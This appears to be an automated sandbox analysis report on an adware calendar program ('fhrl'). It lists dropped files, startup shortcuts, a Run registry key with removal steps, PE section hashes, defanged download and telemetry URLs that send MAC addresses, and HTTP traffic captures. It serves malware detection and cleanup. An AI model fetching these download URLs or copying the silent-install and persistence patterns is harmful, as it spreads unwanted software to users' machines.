%Program Files%\fhrl\Skin\test\¹úÇì½Ú.png (508 bytes)
%Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
%Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
%Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
%Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
%Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
%Program Files%\fhrl\Skin\test\½Ìʦ½Ú.png (545 bytes)
%Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\Æßæ½Ú.png (930 bytes)
%Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
%Program Files%\fhrl\FMTest.exe (14713 bytes)
%Program Files%\fhrl\huangli.xml (6456 bytes)
%Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
%Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
%Program Files%\fhrl\Skin\test\input.png (3 bytes)
%Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
%Program Files%\fhrl\Update.exe (17508 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
%Program Files%\fhrl\KillProc.exe (4255 bytes)
%Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
%Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
%Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
%Program Files%\fhrl\Skin\test\¼Ù.png (1 bytes)
%Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
%Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
%Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\፼ÃÂÈÕÀú\፼ÃÂÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\uninst.exe (738 bytes)
%Program Files%\fhrl\Skin\test\ÖÃÂÇï½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
%Program Files%\fhrl\FMDLL32.dll (14324 bytes)
%Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\³ýæ.png (1 bytes)
%Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
%Program Files%\fhrl\Skin\warn.wav (314 bytes)
%Program Files%\fhrl\subdivis.db (4 bytes)
%Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
%Program Files%\fhrl\Update\version.ini (72 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
%Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
%Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
%Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
%Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
%Program Files%\fhrl\Skin\test\Ãâ€Ã‚ªÂµÂ©.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
%Program Files%\fhrl\FhCalendar.exe (19232 bytes)
%Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\Ê¥µ®½Ú.png (873 bytes)
%Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
%Program Files%\fhrl\Skin\test\index.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
%Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
%Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
%Program Files%\fhrl\Skin\test\¸Ã¶÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¹Ã½Ú.png (913 bytes)
%Program Files%\fhrl\Skin\test\¼ÙÑ¡ÖÃÂ.PNG (3 bytes)
%Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
%Program Files%\fhrl\Skin\test\tip.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
%Program Files%\fhrl\FMDLL.dll (14673 bytes)
%Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
%Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
%Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\፼ÃÂÈÕÀú.lnk (692 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
%Program Files%\fhrl\Skin\test\´º½Ú.png (1 bytes)
%Documents and Settings%\All Users\Desktop\፼ÃÂÈÕÀú.lnk (674 bytes)
%Program Files%\fhrl\Skin\test\dian.png (290 bytes)
%Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÖØÑô½Ú.png (2 bytes)
%Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
%Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\¶ËÎç½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\logo.png (4 bytes)
%Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
%Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\ÇåÃ÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¾Å®½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¸Ç×½Ú.png (846 bytes)
%Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
%Program Files%\fhrl\Skin\test\¶ùï½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
%Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
%Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
%Program Files%\fhrl\Skin\test\ÓÞÈ˽Ú.png (991 bytes)
%Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
%Program Files%\fhrl\Skin\test\°àÑ¡ÖÃÂ.PNG (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\፼ÃÂÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
%Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÃÂ.png (1 bytes)
%Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
%Program Files%\fhrl\Skin\Default\line.png (2 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
%Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
%Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
%Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\ƽ°²Ò¹.png (1 bytes)
%Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
%Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÃÂÑ¡ÖÃÂ.png (2 bytes)
%Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
%Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
%Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·Èð´Å¥³£Ì¬.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
%Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\፼ÃÂÈÕÀú\öÃâ€ÃƒËœÃ‚·Ã§ÂºÃÂÈÕÀú.lnk (691 bytes)
%Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
%Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
%Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
%Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
%Program Files%\fhrl\Skin\test\ĸÇ×½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
%Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
%Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
%Program Files%\fhrl\Skin\test\°à.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÇéÈ˽Ú.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
%Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
%Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\¹â¹÷½Ú.png (536 bytes)
%Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
%Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
%Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
%Program Files%\xxss.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sport.yuejan[1].txt (214 bytes)
C:\fhsli_6_12001.exe (1616 bytes)
C:\114gglm_016.exe (1664 bytes)
C:\xxdd_165.exe (30622 bytes)
%Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
%Program Files%\fhrl\info.db (120 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ??????????(http://www.eyuyan.com)Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 425984 | 201728 | 5.54424 | d0ef0aaee25bba1be37747cce181dfcf |
.rdata | 430080 | 69632 | 17920 | 5.50197 | 2c2e8d17d10be6f7aa7ca9f9876e0a99 |
.data | 499712 | 176128 | 17920 | 5.51743 | 4b67851f67928e82417856798afacf3a |
.rsrc | 675840 | 790528 | 246272 | 5.53726 | 981a356a8a9ce2514af7897a72a377f8 |
.aspack | 1466368 | 12288 | 9728 | 3.47169 | 263888398d77ec23c33d8b15fd5d106b |
.adata | 1478656 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://software.fhrlw.cn/slience/fhsli_6_12001.exe | 61.147.103.147 |
hxxp://software.fhrlw.cn/oemini/info.ini?id=41 | 61.147.103.147 |
hxxp://s-99273.abc188.com/xxdd_165.exe | |
hxxp://software.fhrlw.cn/fhrl/fhrl_0613.exe | 61.147.103.147 |
hxxp://dl2.fhrlw.com/fhrl/fhrl_0613.exe | 125.211.211.8 |
hxxp://software.fhrlw.cn/api/GetConfig.ashx | 61.147.103.147 |
hxxp://software.fhrlw.cn/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 | 61.147.103.147 |
hxxp://software.fhrlw.cn/Update/version.txt?45919992 | 61.147.103.147 |
hxxp://software.fhrlw.cn/Api/GetHoliday.ashx | 61.147.103.147 |
hxxp://software.fhrlw.cn/Api/GetWeather.ashx?province=??&city=?? | 61.147.103.147 |
hxxp://software.fhrlw.cn/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 | 61.147.103.147 |
hxxp://software.fhrlw.cn/ad/fixad.html?id=9995 | 61.147.103.147 |
hxxp://software.fhrlw.cn/js/jquery-1.3.2.min.js | 61.147.103.147 |
hxxp://software.fhrlw.cn/client/picchange.css | 61.147.103.147 |
hxxp://fusa.a.sohu.com/cs/jsfile/js/c.js | |
hxxp://proxy.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= | |
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- | |
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- | |
hxxp://proxy.sogou.com/qi | |
hxxp://njsh.cdn.sogou.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif | |
hxxp://njsh.cdn.sogou.com/testgpimg/sogou_icon_short.png | |
hxxp://acookie.split.taobao.com/cms.gif?id=40490128&extendata= | |
hxxp://proxy.sogou.com/pixel?tid=E0&ver=1&extendata= | |
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- | |
hxxp://software.fhrlw.cn//js/picchange.js | 61.147.103.147 |
hxxp://njsh.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg | |
hxxp://njsh.cdn.sogou.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif | |
hxxp://images.sohu.com/cs/jsfile/js/c.js | 66.102.246.139 |
hxxp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata= | 106.120.151.61 |
hxxp://dl1.fhrlw.com/fhrl/fhrl_0613.exe | 61.147.103.147 |
hxxp://img.fhrlw.com/client/picchange.css | 61.147.103.147 |
hxxp://img.fhrlw.com//js/picchange.js | 61.147.103.147 |
hxxp://acookie.tanx.com/cms.gif?id=40490128&extendata= | 110.75.69.67 |
hxxp://client.fhrlw.com/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 | 61.147.103.147 |
hxxp://update.fhrlw.com/Update/version.txt?45919992 | 61.147.103.147 |
hxxp://img.fhrlw.com/js/jquery-1.3.2.min.js | 61.147.103.147 |
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- | 220.181.124.6 |
hxxp://img04.sogoucdn.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif | 58.215.147.38 |
hxxp://client.fhrlw.com/api/GetConfig.ashx | 61.147.103.147 |
hxxp://client.fhrlw.com/Api/GetWeather.ashx?province=??&city=?? | 61.147.103.147 |
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- | 220.181.124.6 |
hxxp://client.fhrlw.com/Api/GetHoliday.ashx | 61.147.103.147 |
hxxp://ddl.9yfc.com/xxdd_165.exe | 211.149.191.150 |
hxxp://inte.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= | 220.181.124.6 |
hxxp://p.inte.sogou.com/testgpimg/sogou_icon_short.png | 222.211.87.185 |
hxxp://client.fhrlw.com/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 | 61.147.103.147 |
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- | 220.181.124.6 |
hxxp://imgstore04.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg | 1.115.192.23 |
hxxp://img04.sogoucdn.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif | 58.215.147.38 |
hxxp://client.fhrlw.com/ad/fixad.html?id=9995 | 61.147.103.147 |
hxxp://dspcm.brand.sogou.com/qi | 106.120.151.61 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /js/jquery-1.3.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 57272
Content-Type: application/x-javascript
Last-Modified: Fri, 06 Sep 2013 02:48:44 GMT
Accept-Ranges: bytes
ETag: "5bc4399aabaace1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
/*.. * jQuery JavaScript Library v1.3.2.. * hXXp://jquery.com/.. *.. * Copyright (c) 2009 John Resig.. * Dual licensed under the MIT and GPL licenses... * hXXp://docs.jquery.com/License.. *.. * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009).. * Revision: 6246.. */..(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s) >)[^>]*$|^#([\w-] )$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector (this.selector?" ":"") E}else{if(H){G.selector=this.selector "." H "(" E ")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){va
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=614400-819200
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 614400-819200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
>.\${.V....gR.M#.m...=....%..".....y..hg>..Jw...p.1.Zd......I.z1..2K......U..\P.....Q..A..&...zek...{.d.!..k.:..J....jC.?...t...d."...|E..'..j.........=:E.>}0?...2..I..d..._.o^u..-..,)..&.=|...d83.........XY..YZ.,K-...&a.r..Y....@.q ..GE:#JD..nu...x.[.......R.p...$..AV....-J..>..p"0..6.`Qdd..t.z.'#2..O..9.~.L...........X.|.Ock..J..O.[.f...Z.363.q.|..X.)1.....*.SS.'.i.#...7..5P..mp......2tZ/k...e#I...~...(.{..,o2.......Q..`.f.....k1.....S1....:b..^.Fi|......N..=...Li..7.r...Gj....Q..A'#HB.........4.6B...P....S....s..]em........e...a...&..L.....*[.3.?.w.h._.w..$....?7.h......,...n.^.i.3.#)..F...H"t..#...a..$:22...'..........p.a...U[L3...Q9.B.K.......?..........q..\.I.D9<Poz.&k%7d...U.A.UFl#....;(a::.-e.X .%.)..7...w.-..b....k:...~.._}T.q#7s}j............._u.j0 s..C.M".h6y.fzGH.I.YAU6F........(Y.qh.. .:.......'.........<_....,~.-8.9Jf?.,... ..2..".L....G.|.f....,..F..boQ....9....C..\T..t..}..mOHt...fI...X.Z.I..R7D.L.,.b.@.*.p.A..t..7..>.3..;.....@..IMT.}*...j,.\N.w...E.IOZ.../.........O.....QYd.1=.M........s[/j.M..1.^..j..s......4.....c.EX.............>&.G....p.;.*t....0..s...C&.j..".9^....7.>..-..x 